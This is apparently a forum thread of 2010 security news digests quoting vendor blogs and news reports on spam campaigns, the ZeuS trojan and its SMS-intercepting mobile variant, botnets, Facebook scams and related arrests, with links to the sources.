Russian Pro-Spam Registrars
- http://labs.m86security.com/2010/09/russian-pro-spam-registrars/
September 22nd, 2010 - "Since CNNIC, China’s domain regulator, introduced stricter rules for domain registration at the end of last year, spammers have moved on to the Russian .ru TLD to register their spam domains. Similar rules that were apparently made effective on April 1st for Russian registrars do not seem to have had the same effect. Every day we see a continuous stream of newly registered .ru domains in spam email. In fact, in the last month one third of all unique domains we have seen in spam have been .ru domains. This is the highest proportion of any TLD, with .com the second highest accounting for just under one third of spammed domains. Nearly all of these .ru domains are registered though two registrars, Naunet and Reg.ru (also known as NAUNET-REG-RIPN and REGRU-REG-RIPN)... In the last month from spam alone we have seen over 4000 .ru domains registered through Naunet. These are hosting a variety of spam web sites including Ultimate replica, Dr Maxman, online casinos, Via grow and Eurosoft software. We have also seen over 1800 domains registered through Reg.ru in spam over the last month, all of which lead to Canadian pharmacy websites. Reg.ru actually has a feature to register up to 600 domains at once, pretty useful for a spammer... We have however seen domains registered with both of these registrars used as controllers for the Zeus crimeware kit. And recently, Naunet was used to register domains used as control servers for the Asprox botnet, although these were done on a much smaller scale than the spam domains. Several anti-spam groups have already pointed out these registrars as the source of Russian spam domains and that these registrars often ignore requests to suspend illegal domains. With domain blacklisting being a popular anti-spam measure, a continuous supply of fresh domains is vital for any spam operation. These sorts of registrars are making the business of spamming that much easier."


2010-09-25, 23:39

My Opera Found To Host Malware
- http://threatpost.com/en_us/blogs/my-opera-found-host-malware-092410
September 24, 2010 - "... Less than a month after Google's Code hosting service was found to be hosting and serving malicious executables, a search of Opera Software's My Opera free hosting service has also turned up malicious programs, according to a researcher at Kaspersky Lab*. My Opera, a free online hosting service for users of the Opera Web browser, played host to a PHP based IRC botnet, according to a post by Dmitry Bestuzhev, a researcher at Kaspersky Lab. The bot appears to have originated in Brazil, based on an analysis of the code, though its not clear who posted it to the My Opera hosting service or when, Bestuzhev said... he reported the malicious My.Opera .com URLs to Opera Software and that the company has removed them from its site... Like other free hosting services, My.Opera .com is an ideal resource for cyber criminals looking to host their wares on domains with legitimate reputations that are also easy to access..."
* http://www.securelist.com/en/blog/2303/Google_Mozilla_and_now_Opera_Whos_next


2010-09-28, 14:11

Orkut worm - hidden iFrame - malicious JavaScript file...
- http://www.symantec.com/connect/blogs/mau-sabado-orkut-users
Sep. 28, 2010 - "Over the past weekend, it was reported that a new worm was spreading amongst the Orkut user community. As a result, some of the Scrapbooks in Orkut had a hidden iframe inserted, which points to a malicious JavaScript file. This JavaScript does several things including sending a message “Bom Sabado”, meaning Good Saturday in Portuguese, with a hidden iframe to everyone on the infected user’s list of friends. The infected Orkut user is also made to join fake communities. These actions will surely turn “Bom Sabado” to “Mau Sabado ” (bad Saturday in Portuguese). Symantec Security Response detects this malicious JavaScript file as JS.Woorkut. At the end of the day, this worm doesn’t do much harm. If the attacker behind this mischief is maliciously motivated, the worm could potentially cause serious damage. We are quite sure this won’t be the last of this attack and are closely monitoring the situation. In the mean time make sure you keep your antivirus definitions up to date."


2010-09-28, 16:30

Facebook - flood of scams...
- http://www.symantec.com/connect/blogs/social-network-flooded-scam-messages
Sep. 28, 2010 - "Facebook now has over 500 million registered users, which makes this social network (like many other social networks) a very attractive “fishing pool” for attackers. There are so many potential victims that could easily fall for any of the scattered bait. So, it does not come as a surprise that we see another scam campaign launched nearly every week... Always be wary of enticing messages, even when they appear on friends’ profiles. When you are asked to install additional applications or fill out premium surveys just to see a video or picture, it is most likely a scam and it should be fully ignored..."


2010-09-29, 23:14

ZeuS bypasses 2-factor authentication...
- http://blog.trendmicro.com/zeus-now-bypasses-two-factor-authentication/
Sep. 29 2010 - "... certain ZeuS/ZBOT variants are now able to break into users’ bank accounts in spite of two-factor authentication systems. These are frequently used to enhance bank security. These ZeuS variants can specifically use mobile malware to defeat systems that rely on text messages sent via mobile phones on Symbian OS's. The technique behind these attacks is simple. A ZBOT variant modifies target bank sites in such a way that whenever the bank asks for an authentication code to be sent to the mobile phone or not, the user is prompted to enter that phone’s number first. The user then receives a text message containing a link to a rogue Symbian application. This piece of mobile malware, once installed, intercepts all text messages from the specific senders (e.g., banks) and forwards them to a separate number under the control of the attacker. Because the attacker has both the victim’s user name, password, and any authentication code sent over the mobile phone, he/she can conduct malicious business as if the two-factor authentication never took place. While two-factor authentication is definitely a good thing in terms of security, this attack is a reminder that it is not a cure-all that protects against all forms of information theft..."

- http://blog.fortinet.com/zeus-in-the-mobile-zitmo-online-bankings-two-factor-authentication-defeated/
Sep 27, 2010

- http://www.securityweek.com/zeus-goes-mobile-targets-online-banking-two-factor-authentication
Sep 27, 2010

- http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-iii.html
Sep 25, 2010


2010-09-30, 12:17

LinkedIn SPAM campaigns continue...
- http://labs.m86security.com/2010/09/malicious-linkedin-campaigns-continue/
September 30, 2010 - "The malicious LinkedIn spam campaigns of the last few days are continuing in force. The source is the Pushdo botnet, which is back in full force following disruption to its operations last month. The campaigns mimic a LinkedIn update notification... The malicious web page displays code that includes an iframe that loads the Phoenix exploit kit, which attempts to exploit the victim’s browser... And, just in case the auto-exploit doesn’t work, the user is prompted to manually download flash_player_07.78.exe, which is none other than the Zeus (Zbot) data stealing trojan... This campaign is slicker than normal. The LinkedIn email and the Flash Player download image look convincing, signifying that these cybercriminals have taken it up a notch. Going by the number of URL hits we intercepted with our TRACEnet system, some users are falling for it too. Don’t be one of them."
(Screenshots available at the URL above.)

- http://krebsonsecurity.com/2010/09/fake-linkedin-invite-leads-to-zeus-trojan/
Sept 28, 2010
- http://www.virustotal.com/file-scan/report.html?id=1dc848df1d294af28459e4c224e78361114bec79ae48564b27724b0613407e65-1285599788
File name: 655823
Submission date: 2010-09-27 15:03:08 (UTC)
Result: 4/43 (9.3%)
[There is a more up-to-date report (29/43) for this file.]
- http://www.virustotal.com/file-scan/report.html?id=1dc848df1d294af28459e4c224e78361114bec79ae48564b27724b0613407e65-1285857284
File name: ZeuS_binary_4f56196d437be7e1bfecefb92b83872d.exe
Submission date: 2010-09-30 14:34:44 (UTC)
Result: 29/43 (67.4%)


2010-09-30, 21:56

Zeus thieves charged ...
Feds accuse 37 of being Zeus 'money mules'...
- http://www.theregister.co.uk/2010/09/30/zeus_money_mules_charged/
30 September 2010 - "Federal prosecutors in New York City have charged 37 people with participating in a scheme that defrauded banks out of millions of dollars using the Zeus Trojan. Many of the charges were filed against Russian nationals accused of opening bank accounts to launder money transferred from from people who had been infected by the crimeware. The so-called money mules allegedly kept a small percentage and wired the remainder to associates in Eastern Europe. The charges were unsealed on Thursday, a day after UK prosecutors filed charges against 11 alleged Zeus money mules* from Eastern Europe..."
* http://www.theregister.co.uk/2010/09/30/zeus_e_crime_charges/

- http://krebsonsecurity.com/2010/09/u-s-charges-37-alleged-money-mules/
Sept 30, 2010 - "... charged more than 60 individuals — and arrested 20..."
- http://www.fbi.gov/wanted/alert/newyork2.htm

- http://www.theinquirer.net/inquirer/news/1736699/more-arrests-zeus-botnot-crimes
Oct 01 2010 - "Over 80 arrested ... 55 people have already been charged and a further 37 people have been indicted for a raft of fraud and money laundering charges..."

- http://www.theregister.co.uk/2010/10/01/zeus_kingpin_arrest/
1 October 2010 - "Ukrainian police on Thursday arrested five people suspected of orchestrating an international fraud ring that siphoned more than $70m out of bank accounts by infecting computers with the Zeus trojan. The action by Ukraine's SBU was part of an unprecedented partnership among law enforcement agencies in the US, the UK, the Netherlands, and Ukraine, the FBI said in a press release* issued on Friday..."
* http://www.fbi.gov/pressrel/pressrel10/tridentbreach100110.htm

- http://www.fbi.gov/page2/oct10/cyber_100110.html


2010-10-04, 14:31

ZeuS trojan still a threat...
- http://www.pcworld.com/article/206841/despite_busts_zeus_trojan_still_threatens.html
Oct 3, 2010 - "Despite high-profile busts in the U.S., U.K. and Ukraine of cybercriminals using ZeuS malware to steal from online accounts, ZeuS will evolve and remain an effective theft tool for a long time... It's available; it's affordable; it works; its toolkit makes modifying it simple. And the core people who do the major development work have managed to elude capture, hiding behind layers of shifting command and control servers, ISPs, domain registrars and international borders... researchers recently discovered that a ZeuS add-on helps defeat attempts by banks to thwart access by thieves who have used ZeuS to steal usernames and passwords of online banking customers. After users login, the banks send SMS messages to their cell phones containing one-time codes that the customers enter. This two-factor authentication makes it more difficult for criminals to break into accounts, but the developers of ZeuS found a way. A mobile ZeuS Trojan grabs the one-time code and sends it to a ZeuS command and control server where criminals can use it to break into accounts... The people behind ZeuS are good at hiding, says Manky. They use multiple ISPs, multiple command-and-control servers, multiple domains and base this infrastructure in multiple countries, all of which makes it difficult to trace their whereabouts. Compounding the problem, they frequently shift their infrastructure to new providers and new locations to start over... the flexibility of ZeuS make it certain its attacks will keep coming..."

More Arrests...
- http://www.symantec.com/connect/de/blogs/zeus-explosion-leads-more-arrests
Oct 4, 2010

Charted - ZeuS infections
- http://www.symantec.com/connect/sites/default/files/images/Zbot%20infections.PNG


2010-10-05, 22:45

iTunes store - SPAM campaign
- http://pandalabs.pandasecurity.com/itunes-store-spam-campaign/
10.01.10 - "Right after LinkedIn Spam Campaign, we saw a brand new Spam Campaign impersonating iTunes Store. The e-mail appears to arrive from on behalf of iTunes Store and is an exact copy of the official iTunes Store Receipt e-mail... The whole purpose of the email is not to show what you have purchase from iTune Store, is to let you to click “Report a Problem” and lead you to a fake Adobe Flash installer... The exe file is actually connecting to some .ru web site to download some other files..."
(Screenshots available at the URL above.)

- http://www.esecurityplanet.com/features/article.php/3906831/Zeus-Phishing-Campaign-Targets-iTunes-Customers.htm
October 5, 2010 - "... the new scam discovered this week starts with an unsolicited email with the subject, "Your receipt #" followed by a random number. The sender's address claims to be "iTunes Store" and spoofs the address donotreply@itunes[dot]com. Within the email is a bogus iTunes receipt complete with formatting and syntax that makes it pretty clear that it's not from Apple's popular online music store, including the alleged "unit price" and "order total." In the example provided on the AppRiver security blog*, the math didn't add up and the charges for the bogus purchases were several hundred dollars, a figure that would likely raise suspicion among even the most naïve Internet users. The problem, however, is that when users click on any of the links contained within the email, they're redirected to one of 100 or more domains ending in .info where the malicious Zeus Trojan malware is then installed on their PCs or mobile devices..."
* http://blogs.appriver.com/blog/appriver/0/0/no-thanks-for-your-purchase


2010-10-07, 23:01

Browser exploits delivered as HTML attachments
- http://blog.urlvoid.com/browsers-exploits-delivered-as-html-attachment/
October 6, 2010 - "We have logged more than 300 email messages with attached various HTML files containing obfuscated javascript code that is used to redirect the users to download malicious executable files that install the ZBot banking trojan. We also noticed that some HTML files have redirected us to external urls containing web browsers exploit kits with the intent to exploit few IE, FF, PDF and Java vulnerabilities, in order to install (the) TDSS rootkit..."
(Screenshots and email/SPAM subjects at the URL above.)


2010-10-08, 14:33

3.5B malicious URLs... 1H-2010 Threat Report
- http://blog.trendmicro.com/emea-spam-growth-apac-infections-in-global-1h-2010-threat-report/
Oct 6, 2010 - "... Threat Report for the first half of the year. The report focuses on the global trends in online threats that we have seen.
• Threat Trends: Europe became the largest source of spam globally in the first half of the year... Commercial, scam-based, and pharmaceutical/medical SPAM accounted for 65 percent of the total number of SPAM worldwide. HTML SPAM was the most common kind of SPAM.
• We saw significant growth in the number of malicious URLs, which increased from 1.5 billion at the start of the year to over 3.5 billion by June...
• Trojans accounted for about 60 percent of the new patterns... The majority of Trojans lead to data-stealing malware...
• India and Brazil were identified as the countries with the greatest number of computers that became part of botnets. These bots are used to distribute malware, to perpetrate criminal attacks, and to send out SPAM.
• The education sector was the most targeted industry... Nearly half of all malware infections occurred within schools and universities...
• The ZeuS and KOOBFACE malware families were among the most prolific... Hundreds of new ZeuS variants are seen... every day and this is not likely to change in the near future... the KOOBFACE botnet has become the largest social networking threat to date...
• In the first half of 2010, a total of 2,552 vulnerabilities were reported... These vulnerabilities facilitated “drive-by” threats wherein all that is necessary to become infected is to -visit- a compromised website..."

- http://blog.urlvoid.com/1000-hacked-websites-used-for-blackhat-seo/
July 15, 2010


2010-10-09, 10:17

DOWNAD/Conficker II ?...

- http://blog.trendmicro.com/file-infector-uses-domain-generation-technique-like-downadconficker/
Oct 7, 2010 - "... This threat, detected as PE_LICAT.A, uses a domain generation algorithm, a technique last seen in WORM_DOWNAD/Conficker variants. This technique allows the file infector to download and execute malicious files from various servers on the Internet. Like WORM_DOWNAD, PE_LICAT.A generates a list of domain names from which it downloads other malicious files. The domain name generation function is based on a randomizing function, which is computed from the current UTC system date and time. This particular randomizing function returns different results every minute... whenever a file infected by PE_LICAT.A is executed, the malware generates a pseudorandom domain name, with the exact value depending on the system’s time. It then tries to connect to the said domain name. If it is successful, it downloads and executes the file at that pseudorandom URL. If not, it tries up to 800 times, generating a “new” URL every time. This helps ensure that the malware will be able to keep itself updated and even if one or more domains are taken offline, others can take its place..."
- http://blog.trendmicro.com/links-between-pe_licat-and-zeus-confirmed/
Oct 8, 2010 - "... We have been able to isolate a copy of the main file infector, which we detect as PE_LICAT.A-O... It injects itself into the Explorer.exe process, which has two effects. First, it becomes memory resident. Secondly, any file executed afterwards becomes infected with malicious code and is detected as PE_LICAT.A. We have looked into the pseudorandom domains that LICAT uses to download files from. Every time PE_LICAT.A is executed it attempts to download files from these domains, trying to do so a maximum of 800 times... Our monitoring indicates that most of these domains have not been registered. A small number have been registered, and although some of the sites these actually lead to are currently inaccessible, some are still alive and active... These domains appear to link PE_LICAT and ZeuS. Several of the domains that PE_LICAT was scheduled to download files from in late September are confirmed to be known ZeuS domains in that period... Another domain was hosted on an ISP that has seen significant levels of ZeuS-related activity in the past, and is a known haven for cybercrime... The downloader file shows certain behavior often associated with ZeuS..."

- http://blog.trendmicro.com/zeuss-response-to-automated-analysis/
Updated... Oct. 14, 2010


2010-10-13, 13:58

LinkedIn attack also spread Bugat trojan...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227701191
Oct. 12, 2010 - "... while Zeus, indeed, is the undisputed king of financial fraud malware today, a handful of other banking Trojans in the wings are slowly and quietly gaining ground. The Bugat Trojan is one such malware family that has been overshadowed by Zeus, and it turns out it was also distributed in the recent LinkedIn phishing attack - not just Zeus, as some experts had believed. Amit Klein, CTO at Trusteer, says his firm spotted Bugat spreading in the attacks. "There were a lot of malicious payloads being distributed, but the interesting one that we kept seeing was Bugat," Klein says. The LinkedIn phishing attack last month, which was considered the largest-ever such attack, sent LinkedIn members email messages reminding them of messages in their accounts, and included a malicious URL that directed them to a phony site that installed the Bugat executable, according to Trusteer researchers. Bugat was initially discovered in February by SecureWorks* and has some features similar to those found in banking Trojans Zeus and Clampi, but with a few twists. It uses an SSL-encrypted command-and-control (C&C) infrastructure using HTTP-S, and also steals FTP and POP credentials in those sessions. It was originally distributed via the Zbot botnet that spreads the pervasive Zeus. Then there's Carberp**, a banking Trojan that was first spotted spreading in May and now appears to be morphing into an even more sophisticated piece of malware, according to researchers at TrustDefender Labs. It disables other Trojans on the machine it infects and can run without administrative privileges. It also goes after Windows Vista and Windows 7, as well as XP..."
* http://www.secureworks.com/research/blog/index.php/2010/02/08/new-banking-trojan-targeting-ach-and-wire-payment-sites-is-discovered/

** http://www.trustdefender.com/blog/2010/10/06/carberp-%E2%80%93-a-new-trojan-in-the-making/
Oct. 6, 2010

- http://blog.trendmicro.com/carberp-trojan-steals-information/
Oct. 14, 2010


2010-10-13, 13:59

Hijacked MS network pushes Canadian pharmacy
- http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/
12 October 2010 - "For the past three weeks, internet addresses belonging to Microsoft have been used to route traffic to more than 1,000 fraudulent websites maintained by a notorious group of Russian criminals, publicly accessible internet data indicates. The 1,025 unique websites — which include seizemed .com, yourrulers .com, and crashcoursecomputing .com — push Viagra, Human Growth Hormone, and other pharmaceuticals though the Canadian Health&Care Mall. They use one of two IP addresses belonging to Microsoft to host their official domain name system servers, search results from Microsoft’s own servers show. The authoritative name servers have been hosted on the Microsoft addresses since at least September 22... The Register independently verified his findings with other security experts who specialize in DNS and the take-down of criminal websites and botnets. By examining results used with an internet lookup tool known as Dig, short for the Domain Information Groper, they were able to determine that and — which are both registered to Microsoft — are housing dozens of DNS servers that help convert the pharmacy domain names into the numerical IP addresses that host the sites. The most likely explanation, they say, is that a machine on Microsoft's campus has been programmed to do so, probably after it became infected with malware... A Microsoft spokeswoman said she was investigating the findings and expected to provide a statement once the investigation was completed..."

- http://krebsonsecurity.com/2010/10/pill-gang-used-microsofts-network-to-attack-krebsonsecurity-com/
October 13, 2010


2010-10-14, 12:45

MS network used by Pill gang in attack...
- http://krebsonsecurity.com/2010/10/pill-gang-used-microsofts-network-to-attack-krebsonsecurity-com/
October 13, 2010 / Update, 7:34 p.m. ET - "Christopher Budd, Microsoft’s response manager for trustworthy computing, sent this statement via email: “Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.”
- http://www.theregister.co.uk/2010/10/14/microsoft_confirms_ip_hijack/
14 October 2010


2010-10-19, 19:27

More malicious SPAM emails...

Fake UPS shipment error e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Last Published: October 19, 2010... the attachment actually contains a malicious .exe file that, if executed, attempts to infect the user's system with malicious code...

Fake Photograph sharing e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21608
... significant activity on October 18, 2010... informs the recipient to follow URLs to view the photos. However, the URLs could redirect to a malicious .exe file that, upon execution, attempts to infect the recipient's system with malicious code...

Fake Chat invitation e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21588
Last Published: October 18, 2010... text in the e-mail message instructs the recipient to open the attachment to view the photograph. However, the attachment is a malicious .exe file...

Fake UPS ZIP Attachments Spreads Oficla Trojan
- http://blog.urlvoid.com/fake-ups-zip-attachments-spreads-oficla-trojan/
October 20, 2010

Fake Video Link E-Mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21648
Last Published: October 27, 2010


2010-10-21, 14:30

Kaspersky site hit by hacks - again...
- http://news.techworld.com/security/3244883/kaspersky-website-hit-by-hackers/
20 October 10 - "Scammers who try to trick victims into downloading fake antivirus software can strike almost anywhere. On Sunday they hit the website of Kaspersky Lab, a well-known antivirus vendor. Someone took advantage of a bug in a Web program used by the Kasperskyusa.com website and reprogrammed it to try and trick visitors into downloading a fake product, Kaspersky confirmed Tuesday. Kaspersky didn't identify the flaw, but said it was in a "third-party application" used by the website. "As a result of the attack, users trying to download Kaspersky Lab's consumer products were redirected to a malicious website," the antivirus vendor said. The website caused a pop-up window to appear that simulated a virus scan of the user's PC, and offered to install an antivirus program that was in fact bogus... According to Kaspersky, its website was redirecting users to the rogue antivirus site for about three-and-a-half hours Sunday... This isn't the first time Kaspersky has had to audit its websites after an incident. In February 2009 a hacker was able to break into the company's US support site after discovering a Web programming flaw..."


2010-10-22, 17:42

Employees circumvent security controls via Webmail, file sharing...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227900492
Oct. 21, 2010 - "... According to Palo Alto Networks*, personal Webmail (such as Gmail, Hotmail, and Yahoo Mail), instant messaging, and peer-to-peer and browser-based file-sharing apps were used in 96 percent of the enterprises, and those apps made up nearly one-fourth of all bandwidth. The bad news is that most of these apps are unmonitored and not controlled by the enterprise, which leaves the organization open to attack or data leakage, the report says. Workers' Facebook activity is more voyeuristic, with 69 percent of Facebook traffic on these organizations being used for viewing Facebook pages, while Facebook apps make up about 4 percent of traffic and posts, only about 1 percent of traffic... There were 114,000 log instances of Conficker infections** among Palo Alto customers... Web- or browser-based file-sharing now constitutes 96 percent of file sharing, according to the data, with apps including Skydrive, USendIt, RapidShare, and DocsStock. BitTorrent remains the most popular peer-to-peer file-sharing program in use in companies..."
* http://www.paloaltonetworks.com/news/press_releases/2010-1021-aur-report.html

** http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2010-10-29, 14:22

SPAM still prolific ...

All Tricks & No Treat for Anti-Spam Engines
- http://community.websense.com/blogs/securitylabs/archive/2010/10/29/all-tricks-amp-no-treat-for-anti_2D00_spam-engines.aspx
29 Oct 2010 - "... always be cautious in opening emails from unknown users."

“Pump & Dump” Spam turns to Indian Stocks
- http://www.symantec.com/connect/blogs/pump-dump-spam-turns-indian-stocks
Oct. 28, 2010

Dating and Malware Spam dominates the Top Spam Subject Lines
- http://www.symantec.com/connect/blogs/dating-and-malware-spam-dominates-top-spam-subject-lines
Oct. 28, 2010

... MORE examples of spam subject lines:
Subject: DIWALI OFFER FROM <removed> UK.
Subject: Celebrate this Diwali with <removed> T-Shirts - Redeem voucher included
Subject: <removed>: Diwali offer
- http://www.symantec.com/connect/blogs/don-t-let-spammers-darken-your-light-festival
Oct. 28, 2010


2010-11-05, 20:02

Don’t click that “pic.exe” file
- http://labs.m86security.com/2010/11/hi-my-love-please-dont-click-that-pic-exe-file/
November 3, 2010 - "Nowadays, spammers usually craft elaborate and enticing scams to lure a lot of people into taking action. However, a spam campaign we observed recently is one of the more cruder forms of social engineering. Attached to the spam message is simply an executable file named “pic.exe” that claims be naked pictures. This spam has been circulating with the subject line, “hi my love“... spammers probably don’t care if a spam campaign is unsophisticated. They can send millions of messages, and a few people will inevitably get sucked in anyway. Secondly, these days getting infected usually means multiple pieces of malware doing different things on your computer. Some malware may be obvious like Fake AV, but most will be hidden."


2010-11-08, 18:28

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Threat Outbreak Alert: Fake Attached Resume E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Unicaja Bank Security Update E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Security Update For Microsoft Windows E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Self-View Video Link E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Scanned Document E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Chat Invitation E-mail Messages...
November 08, 2010

- http://blogs.cisco.com/security/out-of-control-user-frenetic-it/
November 8, 2010 - "When you access your email each day, do you do so at a distance of 15 paces because you’re just not sure what might jump out of that inbox? You can just about anticipate an email detailing how another user has caused a “blip” that will stretch your capabilities to protect both the user during their online engagements and the assets of the company..."

- http://www.ironport.com/toc/
Virus Outbreak In Progress - (Last Updated: November 10, 2010)
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77


2010-11-11, 17:43

Facebook app links to malware...
- http://www.trustedsource.org/blog/512/Facebook-App-Links-to-Malware
November 11, 2010 - "... a malicious Java applet was being linked through a Facebook application. Users don’t have to install the Facebook app on their profiles to be be exposed to this threat. On browsing to a specific Facebook application page displayed in an Eastern European language, the page connects to a malicious site that hosts a signed Java applet that claims to be “Sun_Microsystems_Java_Security_Update_6" and is published by “Sun Java MicroSystems”... The only indication of suspicious activity is the fact that the digital signature cannot be verified by a trusted source. The warning also requests permission from the user to run the applet... In this case, when the user clicks Run, the Java applet downloads an arbitrary executable from a URL passed as a parameter on the website... The downloaded trojan payload is a password stealer which search for passwords stored on the user’s machine..."

> http://forums.spybot.info/showpost.php?p=388366&postcount=7


2010-11-12, 17:24

(More) Fake e-mail SPAM messages...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Hotmail Account Deactivation E-mail Msgs... November 12, 2010
Fake Scanned Document E-mail Msgs... November 12, 2010
Fake DHL Shipment E-mail Msgs... November 12, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress - (Last Updated: November 12, 2010)


2010-11-15, 21:24

Malicious SPAM...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Royal Bank Security Update E-Mail Messages...
Fake Unicaja Bank Security Update E-mail Messages...
Rapidshare Link E-mail Messages...
Fake Chat Invitation E-mail Messages...

- http://www.ironport.com/toc/
Virus Outbreak In Progress - November 15, 2010

- http://blog.trendmicro.com/russian-spam-on-the-rise/
Nov. 15, 2010


2010-11-16, 11:26

Worms in IM chats...
- http://www.theinquirer.net/inquirer/news/1897876/microsoft-disables-live-messenger-links
Nov 15 2010 - "... Microsoft has shut down links to some websites in the 2009 builds of Windows Live Messenger. According to the Vole's blog*, disabling the feature was designed to prevent the spread of a malicious worm. The worm requires users to click a link within a message, upon which it will load a webpage that downloads the worm to your PC and then it sends the same message to people in your contact list. It only affected those who had not upgraded to the newest version of Messenger that uses Microsoft's Smartscreen, which shows up when you click on any link shared via Messenger. A spokesperson said that the malicious worm was trying to spread itself through many of the world's largest instant messaging and social networks, including Windows Live Messenger 2009. The worm spreads by inserting a link into an IM conversation with a person whose computer is already infected. Normally, when Messenger sees a web address in a conversation it is turned into a hyperlink which, when clicked, automatically opens in a web browser. This feature made it a doddle for the worm to be unknowingly installed on your computer by clicking on the link and being sent to a website containing the malicious software. Some customers might also see a notification in the main Messenger window warning them that some features might not be available, the spokesperson said."
* http://windowsteamblog.com/windows_live/b/windowslive/archive/2010/11/12/security-alert-active-links-in-messenger-2009-temporarily-turned-off-to-prevent-a-malicious-worm.aspx


2010-11-18, 03:51

Asprox spamming more Sasfis
- http://labs.m86security.com/2010/11/asprox-spamming-more-sasfis/
November 17, 2010 - "Ever since the recent take down attempts of the Pushdo and Bredolab botnets, the volume of malicious spam has dropped substantially. But there is still one major player spamming out malicious executables, namely the Asprox spambot. Malicious spam campaigns purporting to be from DHL, Fedex, UPS or USPS have been spammed by the Asprox botnet ever since it resurrected in the mid 2010. These messages contain zip file attachments containing executable files which are almost exclusively the Trojan Sasfis, a downloader bot... The extracted Sasfis executable file usually has a Microsoft Excel icon. The payload varies depending on the task sent by the control server. Recently, we have seen it download Fake AV installers... Currently, the Sasfis trojan is requesting commands from the domain name showtimeru .ru... In our previous blogs* about Asprox, we highlighted three of the domains that the bot connects to. In the newer samples however, Asprox is connecting to the inglo-kotor .ru domain name. Interestingly, the previous and the newer domains points to the same server in Sweden**... In summary, it is the same old well-worn theme that Asprox has been using for six months. Don’t get too excited if you see this in your inbox, especially if you are an avid online buyer expecting a package."
* http://labs.m86security.com/2010/06/another-round-of-asprox-sql-injection-attacks/

(Screenshots available at both m86 URLs above.)

** http://labs.m86security.com/wp-content/uploads/2010/11/IP-sweden.png


2010-11-20, 13:48

New Asprox Facebook SPAM campaign
- http://labs.m86security.com/2010/11/new-asprox-facebook-spam-campaign/
November 19, 2010 - "... new Asprox template purporting to be an email from Facebook support. This spam campaign claims the user’s Facebook password has been changed or access to their account has been blocked... As before, the attachment is the Sasfis trojan, the same breed of downloader Trojan we discussed yesterday. This sample however connects to a different domain; pupmypzed .ru... Just this week, there was outrage when many Facebook users, many of whom were female, found their accounts disabled following an automated Facebook system ‘cleanup’ of dubious accounts. Spammers may have taken advantage of this publicity..."
(Screenshots available at the m86 URL above.)


2010-11-22, 14:10

- http://labs.m86security.com/2010/12/mcafee-secure-short-url-service-or-is-it/
December 6, 2010 - "... Users should carefully check the links coming from emails, Facebook or any other social network, when the sender is unknown and the link is shortened, because there is no guarantee the URL is safe ..."

Facebook SCAMS multiply...
- http://nakedsecurity.sophos.com/2010/11/21/beware-the-justin-bieber-erection-facebook-scam/
November 21, 2010 - "... Surveys like this generate revenue for the scammers who are behind the application - they earn commission for every survey that is completed. In the background meanwhile, the rogue application has abused your social networking account spreading the spam virally via your wall to your Facebook friends and family... scams like this will continue for as long as users continue to fall for silly tricks like this, and the scammers continue to find it financially rewarding. If you've been hit by a scam like this, remove references to it from your newsfeed, and revoke the right of rogue applications to access your profile via Account/ Privacy Settings/ Applications and Websites. Don't forget - if you know young people who use Facebook, you should warn them about scams like this and teach them not to trust every link that is placed in front of them..."

- http://nakedsecurity.sophos.com/2010/11/03/justin-bieber-hit-girl-facebook-survey-scam/

- http://nakedsecurity.sophos.com/2010/11/20/jeremy-kyle-is-forced-to-step-back-after-man-starts-headbutting-facebook-scam/

- http://nakedsecurity.sophos.com/2010/07/23/viewed-facebook-profile-care/

- http://nakedsecurity.sophos.com/2010/10/07/father-catches-daughter-on-her-webcam-its-a-facebook-survey-scam/

20 percent of Facebook users exposed to malware
- http://news.cnet.com/8301-13577_3-20023626-36.html
November 22, 2010

Security apps for Facebook ...
- http://www.facebook.com/bitdefender.safego?v=info
BitDefender safego
- http://www.facebook.com/apps/application.php?id=177000755670
Defensio - Websense

- http://www.theregister.co.uk/2010/11/24/facebook_malware_survey/
24 November 2010 - "... one in five items on the news feeds of Facebook users lead to malicious content. More than three in five (60 per cent) of these attacks come from notifications generated by malicious third-party applications on Facebook's developer platform - BitDefender's stats comes from users of safego... similar to figures from users of BitDefender's tool... Websense's Defensio tool... about 10 per cent are spam or malicious..."

Facebook accounts disabled
- http://sophosnews.files.wordpress.com/2010/11/facebook-trend.jpg?w=640

- http://nakedsecurity.sophos.com/2010/11/16/bug-causes-havoc-facebook-as-accounts-disabled/
November 16, 2010


2010-11-25, 03:29

Holiday shopping advisories ...

- http://news.cnet.com/8301-27080_3-20023728-245.html
November 24, 2010

- http://blog.trendmicro.com/with-holiday-wishes-come-poisoned-searches/
Nov. 23, 2010

- http://www.ic3.gov/media/2010/101118.aspx
November 18, 2010

- http://www.f-secure.com/en_US/security/security-center/security-stories/holiday-online-shopping.html

- http://www.bbb.org/us/article/top-ten-cyber-monday-tips-for-staying-safe-when-shopping-online-23416

- http://newsroom.mcafee.com/article_display.cfm?article_id=3707


2010-11-30, 19:54

Ecard SPAM malware - from "banks" ...
- http://techblog.avira.com/2010/11/30/ecards-from-banks/en/
